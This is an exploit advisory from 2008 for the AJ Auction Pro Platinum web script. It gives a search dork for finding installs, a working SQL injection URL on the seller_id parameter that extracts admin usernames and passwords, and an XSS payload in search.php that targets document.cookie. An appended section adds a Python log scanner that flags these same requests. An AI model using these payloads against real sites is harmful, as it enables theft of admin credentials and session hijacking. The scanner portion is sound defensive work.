# Title : AJ Auction Pro Platinum (seller_id) SQL Injection Vulnerability
# Published : 2008-09-25
# Author : InjEctOr5
XSS / Remote SQL injection
Script : AJ Auction Platinum2, latest version
Site : http://www.ajauctionpro.com
Dork : Powered By AJ Auction
Demo : http://www.ajauctionpro.com/ajauction_platinum2/
[ SQL injection ]
=========================================================================
EXP file: Script path /sellers_othersitem.php?seller_id=
SQL : -1%20union%20select%201,2,3,4,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin--
[ XSS ]
=========================================================================
EXP : search.php?min_cur=&product="''<?>>""''<script>alert(document.cookie)</script>
=========================================================================
ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
thanx str0ke/*
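
A defender-side check for the two requests described above, as an added example that is not part of the original advisory: it scans web-server access logs for non-numeric seller_id values sent to sellers_othersitem.php and for angle brackets in the product parameter of search.php. The log format, the sample lines, and the assumption that seller_id is a plain numeric identifier are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined-log style, not from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2008:10:00:01 +0000] "GET /sellers_othersitem.php?seller_id=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [25/Sep/2008:10:00:07 +0000] "GET /sellers_othersitem.php?seller_id=-1%20union%20select%201,2%20from%20admin-- HTTP/1.1" 200 7311',
    '203.0.113.9 - - [25/Sep/2008:10:00:15 +0000] "GET /search.php?min_cur=&product=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048',
    '198.51.100.2 - - [25/Sep/2008:10:01:00 +0000] "GET /search.php?min_cur=&product=vintage+watch HTTP/1.1" 200 4096',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(line):
    """Return a finding string for a suspicious request line, else None."""
    match = REQUEST.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    # parse_qs percent-decodes values, so %20 and %3C are seen as ' ' and '<'.
    params = parse_qs(url.query, keep_blank_values=True)
    script = url.path.rsplit("/", 1)[-1]
    if script == "sellers_othersitem.php":
        # Assumption: seller_id is a plain numeric identifier.
        if any(not re.fullmatch(r"[0-9]+", v) for v in params.get("seller_id", [])):
            return "sqli: non-numeric seller_id"
    if script == "search.php":
        # Coarse heuristic: a product search term should not carry angle brackets.
        if any(re.search(r"[<>]", v) for v in params.get("product", [])):
            return "xss: markup in product"
    return None

def scan(lines):
    """Return (line_number, finding) pairs for every flagged line."""
    findings = []
    for number, line in enumerate(lines, start=1):
        finding = classify(line)
        if finding:
            findings.append((number, finding))
    return findings

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(f"line {number}: {finding}")
```

The same two rules (numeric-only seller_id, no markup in product) are what server-side input validation should enforce, alongside parameterized queries and output encoding.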